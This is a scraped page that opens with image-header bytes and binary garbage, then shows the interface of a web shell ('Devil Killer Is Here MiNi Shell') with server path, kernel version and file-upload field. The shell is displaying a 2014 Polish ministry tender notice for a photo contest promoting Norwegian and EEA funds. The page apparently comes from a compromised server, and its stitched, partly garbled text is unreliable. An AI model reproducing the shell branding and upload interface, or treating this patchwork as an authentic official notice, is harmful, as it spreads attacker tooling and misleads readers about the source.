JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140411/125650-N-2014.html

<p class="kh_header"><b>Warszawa: Opracowanie koncepcji i kompleksowa realizacja konkursu fotograficznego promujacego fundusze norweskie i EOG</b><br>
<b>Numer ogłoszenia: 125650 - 2014; data zamieszczenia: 11.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Infrastruktury i Rozwoju , ul. Wspólna 2/4, 00-926 Warszawa, woj. mazowieckie, tel. 22 273 71 50, faks 22 273 89 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mir.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie koncepcji i kompleksowa realizacja konkursu fotograficznego promujacego fundusze norweskie i EOG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wstępny opis zamówienia -  wydarzenie pod roboczą nazwą FOTO GRANTS
Poniższa koncepcja jest wstępną propozycją, która podlega negocjacjom z potencjalnymi Wykonawcami oraz ewentualnym modyfikacjom. 
Typ:  Konkurs fotograficzny
Cel: Promocja funduszy norweskich i EOG www.eog.gov.pl z wykorzystaniem motywu przewodniego jakim będą szeroko rozumiane wartości: demokracji, wolności, postaw obywatelskich  w związku z 25. rocznicą wolnych wyborów w Polsce.
Organizacja konkursu składa się z 5 etapów.  
Etap 1
Czas trwania: min. 1 m-c
- Utworzenie strony www oraz fanpagea na portalu Facebook wraz z aplikacją umożliwiającą otrzymywanie i rejestrowanie zgłoszeń uczestników oraz administrowanie ich treściami.
- Promocja fanpagea m.in. poprzez reklamy na portalu facebook, kampanie w internecie, outdoor, 
- Organizacja akcji wspierających ruch na fanpagu.
- Rekrutacja uczestników konkursu i budowanie społeczności wokół fanpagea - użytkowników odwiedzających fanpage i wykonujących na nim określone czynności.
Etap 2
Czas trwania: min. jeden wieczór
- Organizacja eventu dla osób pozyskanych w trakcie aktywności na fanpageu, stronie internetowej konkursu oraz innych akcji rekrutacyjnych w postaci  koktajlu podczas którego rozlosowane zostaną miejsca na kursie fotograficznym. Event musi mieć charakter wieczornego przyjęcia z oprawą muzyczną, dopasowaną do okazji dekoracją, poczęstunkiem, oświetleniem. Event musi być prowadzony przez konferansjera, a także obsługiwany przez dedykowany personel pomocniczy. 
- Miejsce - prestiżowa lokalizacja w centralnej Warszawie: jeden z obiektów muzealnych lub jeden z obiektów teatralnych umożliwiający organizację eventu. Event może być także zorganizowany w jednym z prestiżowych klubów muzycznych. Event musi być jedyną imprezą organizowaną w danej lokalizacji, w tym samym czasie.
- Event ma nawiązywać do motywu przewodniego konkursu oraz tematyki funduszy norweskich i EOG.
- Event może być na około 100-150 osób pozyskanych w wyniku aktywności na fanpageu i stronie www.
Etap 3
Czas trwania: około 1 miesiąca
- Wykonawca zapewnia i koordynuje udział wylosowanych uczestników ok. 10-15 osób w kursie fotograficznym. 
- Kurs musi być prowadzony w Warszawie przez profesjonalną placówkę kształcenia ustawicznego, działającą na podstawie przepisów ustawy o systemie oświaty. Placówka ta powinna dysponować minimum dwoma, wyposażonymi studiami fotograficznymi oraz minimum jedną pracownią komputerową. 
- W czasie trwania kursu Wykonawca zobowiązany jest do relacjonowania na stronie www i fanpageu postępów uczestników oraz działań przez nich podejmowanych.
- Uczestnicy, pod nadzorem Wykonawcy, mogą mieć za zadanie umieszczanie na fanpageu fb lub stronie www zdjęć lub wpisów, dokumenujących swoje działania.  
- Uczestnicy otrzymują zadanie wykonania serii zdjęć o określonej tematyce: nawiązującej do motywu przewodniego konkursu.
- Dodatkowo na fanpageu jak i innych stronach www - musi toczyć się kampania informacyjna.
Etap 4
Czas trwania: ok. 2 tyg.
- Wykonawca udostępnia zdjęcia uczestników m.in. na stronie www i na fanpageu, gdzie będzie odbywać się głosowanie na najlepszą pracę poprzez stworzoną aplikację - do czasu oficjalnego finału.
- Organizacja akcji wspierających ruch na fanpageu, zachęcający do oddania głosów.
Etap 5
Czas trwania: jeden dzień
- Organizacja gali wręczenia nagród  wraz z wernisażem prac uczestników. 
- Gala musi mieć charakter uroczysty z oprawą muzyczną, drobnym poczęstunkiem. Event musi być prowadzony przez konferansjera, a także obsługiwany przez dedykowany personel pomocniczy. 
- Miejsce - prestiżowa lokalizacja w centralnej Warszawie: jeden z obiektów muzealnych lub jeden z obiektów teatralnych umożliwiający organizację gali. Gala może być także zorganizowana w jednym z prestiżowych klubów muzycznych. Gala musi być jedyną imprezą organizowaną w danej lokalizacji, w tym samym czasie.
- Gala ma nawiązywać do motywu przewodniego konkursu oraz tematyki funduszy norweskich i EOG.
- Gala ma przeznaczona być dla uczestników konkursu,  osób pozyskanych w wyniku aktywności na fanpageu i stronie www oraz innych gości.
Każdy etap konkursu powinien być relacjonowany na stronie www oraz fanpageu.  Obserwatorzy konkursu na fanpageu  i stronie www powinni mieć szanse zapoznania się z uczestnikami i śledzenia ich losów.

Od Wykonawcy oczekujemy m.in.:
- Opracowania szczegółowej koncepcji  całego wydarzenia,
- Kompleksowego wykonania opracowanej koncepcji,
- Rekrutacji uczestników konkursu oraz eventów, prowadzenia korespondencji z uczestnikami,
- Administrowania i moderowania wszystkimi utworzonymi serwisami elektronicznymi,
- Promocji wydarzenia,
- Zakupu nagród w imieniu organizatora..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5, 79.95.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), należycie wykonał: 
a) 2 dwie usługi polegające na przygotowaniu, koordynacji i przeprowadzeniu działań promocyjnych w tym np. konkursu, przy czym wartość co najmniej jednej usługi wyniosła minimum 100 000,00 zł brutto, a wartość drugiej usługi wyniosła minimum 50 000,00 zł brutto  . Powyższe kwoty nie mogą zawierać kosztów druku publikacji i kosztów materiałów promocyjnych; 
oraz
b) 2 dwie usługi polegające na redagowaniu oraz administrowaniu serwisami elektronicznymi lub profilami na portalach społecznościowych, przy czym wartość każdej z tych usług wyniosła co najmniej 10 000 zł brutto. 
oraz
c) 2 dwie usługi polegające na zaplanowaniu, przygotowaniu, zorganizowaniu i przeprowadzeniu uroczystości wydarzeń wręczenia nagród wraz z występem artystycznym, przy czym wartość jednej usługi wynosiła co najmniej 60 000 zł brutto.
W przypadku, jeżeli wartość usługi została wyrażona w walucie obcej, do ustalenia wartości tej usługi w złotych polskich należy przyjąć średni kurs NBP z dnia publikacji ogłoszenia o zamówieniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował zespołem osób, wyznaczonym do realizacji zamówienia, w skład którego wejdą: 
a. kierownik projektu posiadający doświadczenie w zarządzaniu 2 projektami o charakterze promocyjnym i lub informacyjnym o łącznej wartości minimum 200.000,00 zł, a do jego zadań należało kompleksowe zarządzanie zasobami projektu promocyjnego tj. zespołem projektowym, budżetem i harmonogramem,  a okres realizacji każdego z projektów trwał nie krócej niż 2 miesiące; 
b. pracownik Biura Konkursu, który posiada doświadczenie w realizacji jednego projektu informacyjnego i lub promocyjnego, trwającego nie krócej niż 2 miesiące; 
c. redaktor, który: jest autorem i lub współautorem 10 artykułów o tematyce społeczno-kulturalnej, w tym co najmniej 5 artykułów prasowych oraz koordynował prace redakcyjne w 5 serwisach elektronicznych, w tym min 2 profile na portalach społecznościowych; 
d fotograf, który posiada doświadczenie w wykonaniu 3 reportaży fotograficznych, za reportaż fotograficzny zamawiający przyjmuje wykonanie serii minimum 5 zdjęć fotograficznych dotyczących jednego tematu na potrzeby publikacji wystawy, a każdy reportaż był wykonany na potrzeby innej publikacji lub wystawy; 
e. grafik posiadający doświadczenie polegające na: 
- zaprojektowaniu 5 publikacji elektronicznych, w tym stron internetowych oraz
- zaprojektowaniu 8 publikacji promocyjnych (np. ulotki, kalendarze, biuletyny, broszury, foldery); 
f) informatyk posiadający doświadczenie polegające na- uruchomieniu i administrowaniu 5 serwisami elektronicznymi  portale internetowe i lub aplikacje i lub profile oraz fanpage na portalach społecznościowych. 
Funkcje pracownika Biura Konkursu i redaktora może pełnić jedna osoba. Funkcje grafika i informatyka może pełnić jedna osoba.
Każda z osób wskazana w wykazie, wyznaczona do realizacji zamówienia winna spełniać jeden z ww. warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne usługi uznaje się; a) 2 dwie usługi polegające na przygotowaniu, koordynacji i przeprowadzeniu działań promocyjnych w tym np. konkursu, przy czym wartość co najmniej jednej usługi wyniosła minimum 100 000,00 zł brutto, a wartość drugiej usługi wyniosła minimum 50 000,00 zł brutto. Powyższe kwoty nie mogą zawierać kosztów druku publikacji i kosztów materiałów promocyjnych; 
oraz
b) 2 dwie usługi polegające na redagowaniu oraz administrowaniu serwisami elektronicznymi lub profilami na portalach społecznościowych, przy czym wartość każdej z tych usług wyniosła co najmniej 10 000 zł brutto. 
oraz
c) 2 dwie usługi polegające na zaplanowaniu, przygotowaniu, zorganizowaniu i przeprowadzeniu uroczystości wydarzeń wręczenia nagród wraz z występem artystycznym, przy czym wartość jednej usługi wynosiła co najmniej 60 000 zł brutto.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 4.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Obiektywne kryteria wyboru ograniczonej liczby kandydatów: 
Do składania ofert wstępnych zostanie zaproszonych 4 wykonawców, którzy spełniają warunki udziału w postępowaniu, o których mowa w  III.3.2 niniejszego ogłoszenia. Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza lub równa 4 Zamawiający zaprosi do składania ofert wstępnych wszystkich wykonawców spełniających te warunki. 
Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 4, wówczas Zamawiający zaprosi do składania ofert wstępnych 4 wykonawców. Wybór wykonawców zostanie dokonany na podstawie:
a. ilości dodatkowych poza wymienionymi w  III.3.2 usług spełniających warunek, o którym mowa w sekcji III.3.2 a) - max. 5, w przypadku których wartość każdej z usług była równa lub większa 100 000,00 zł brutto.  Za każdą usługę, której należyte wykonanie będzie potwierdzone referencjami Wykonawca otrzyma 1 pkt. 
b. Ilość zorganizowanych konkursów - max. 5, których wartość  bez kosztów druku publikacji i kosztów materiałów promocyjnych była równa lub większa 50 000,00 zł brutto. Za każdą usługę Wykonawca otrzyma 1 pkt;
c. Za wyznaczenie do realizacji zamówienia dodatkowej osoby - fotografa, która spełnia warunek udziału w postępowaniu o którym mowa w III.3.4 d) niniejszego ogłoszenia oraz która posiada dodatkowo doświadczenie fotoedytorskie Wykonawca otrzyma 2 pkt. 
Jeżeli w wyniku powyższej kwalifikacji dwóch lub więcej wykonawców uzyska taką samą liczbę punktów, o kolejności ich wniosków w rankingu zadecyduje wyższa wartość zsumowanych wartości brutto usług wykazanych w Wykazie usług. Sumowaniu będą podlegały tylko te usługi z Wykazu usług danego wykonawcy, które spełniają warunki określone w sekcji III.3.2 a, o najwyższej wartości.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Jakość - 70</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mir.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia zostanie przekazana wykonawcą, którzy zostana dopuszczeniu do udzialu w postepowaniu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 11:00, miejsce: Ministerstwo Infrastruktury i Rozwoju, 00-926 Warszawa, ul. Wspólna 2/4, pok. 0001 (Kancelaria Ogólna) w godz. 8:15 do 16:15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Finansowanie ze środków Pomocy Technicznej Mechanizmu Finansowego EOG i Norweskiego Mechanizmu Finansowego 2009-2014.
2.Wykonawca może złożyć tylko jeden wniosek o dopuszczenie do udzialu w postepowaniu. Złożenie więcej niż jednego wniosku  spowoduje odrzucenie wszystkich wniosków złożonych przez wykonawcę.
3. Wniosek wraz z załącznikami musi być sporządzona w sposób czytelny.
4. Wniosek musi być podpisana przez wykonawcę, tj. osobę (osoby) reprezentującą wykonawcę, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze lub osobę (osoby) upoważnioną do reprezentowania 
wykonawcy.
5.Jeżeli osoba (osoby) podpisująca wniosek (reprezentująca wykonawcę lub wykonawców występujących wspólnie) działa na podstawie pełnomocnictwa, pełnomocnictwo to w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza musi zostać dołączone do wniosku.
6.Wniosek wraz z załącznikami musi być sporządzony w języku polskim. Każdy dokument dołączony  do wniosku sporządzony w języku innym niż polski musi być złożony wraz z tłumaczeniem na język polski.
7. Wniosek o dopuszczenie do udzialu w postepowaniu sporządzony i wypełniony według wzoru stanowiącego Załącznik nr 1 do ogloszenia o zamówieniu.
a) pełnomocnictwo do reprezentowania wykonawcy, o ile wniosek sklada  składa pełnomocnik.
8. Wniosek o dopuszczenie do udzialu w postepowaniu wraz z zalacznikami  należy umieścić w kopercie-opakowaniu i zabezpieczyć w sposób uniemożliwiający zapoznanie się z jej zawartością bez naruszenia zabezpieczeń przed upływem terminu otwarcia ofert.
9. Na kopercie-opakowaniu należy umieścić następujące oznaczenia:
a) nazwa, adres, numer telefonu i faksu wykonawcy,
b) Ministerstwo Infrastruktury i Rozwoju, Biuro Dyrektora Generalnego, ul. Wspólna 2/4, 00-926 Warszawa,
c) Wniosek o dopuszczenie do udzialu w postepowaniu na Opracowanie koncepcji i kompleksowa realizacja konkursu fotograficznego promujacego fundusze norweskie i EOG, nr sprawy  BDG-V-281-20-RB/14,
d) Nie otwierać przed dniem 28 kwietnia 2014 r. do godz. 12:00.
10. Wniosek wraz z dokumentami, należy złożyć w terminie do dnia 28 kwietnia 2014 r. do godziny 11.00 w siedzibie Ministerstwa Infrastruktury i Rozwoju, 00-926 Warszawa, ul. Wspólna 2/4, pok. 0001 (Kancelaria Ogólna Ministerstwa Infrastruktury i Rozwoju). Godziny pracy Kancelarii - od poniedziałku do piątku od 8.15 do 16.15, z wyłączeniem dni ustawowo wolnych od pracy.
11.Decydujące znaczenie dla zachowania terminu składania wniosków ma data i godzina wpływu oferty w miejsce wskazane w pkt 10, a nie data jej wysłania przesyłką pocztową lub kurierską.
12.Przy składaniu wniosków, w celu zachowania terminu, o którym mowa w pkt 10, należy uwzględnić fakt objęcia budynku, w którym należy złożyć ofertę, systemem kontroli dostępu.
13.Otwarcie wniosków o dopuszczenie do udzialu w postepowaniu  nastąpi w dniu 28 kwietnia 2014 r. o godzinie 12.00 w siedzibie Ministerstwa Infrastruktury i Rozwoju, Warszawa, ul. Wspólna 2/4,pok 1107
14.Wykonawca może przed upływem terminu składania wniosków wycofać wniosek, poprzez złożenie pisemnego powiadomienia podpisanego przez osobę (osoby) uprawnioną do reprezentowania wykonawcy. 
15.Otwarcie wniosków o dopuszczenie udzialu w postepowaniu  jest jawne. Wykonawcy mogą uczestniczyć w sesji otwarcia ofert. 
16.Wnioski o dopuszczenie udzialu w postępowaniu  złożone po terminie, o którym mowa w punkcie 10, zostaną niezwłocznie zwrócone wykonawcom. 
17.Korespondencję związaną z niniejszym postępowaniem należy kierować na adres:
Ministerstwo Infrastruktury i Rozwoju
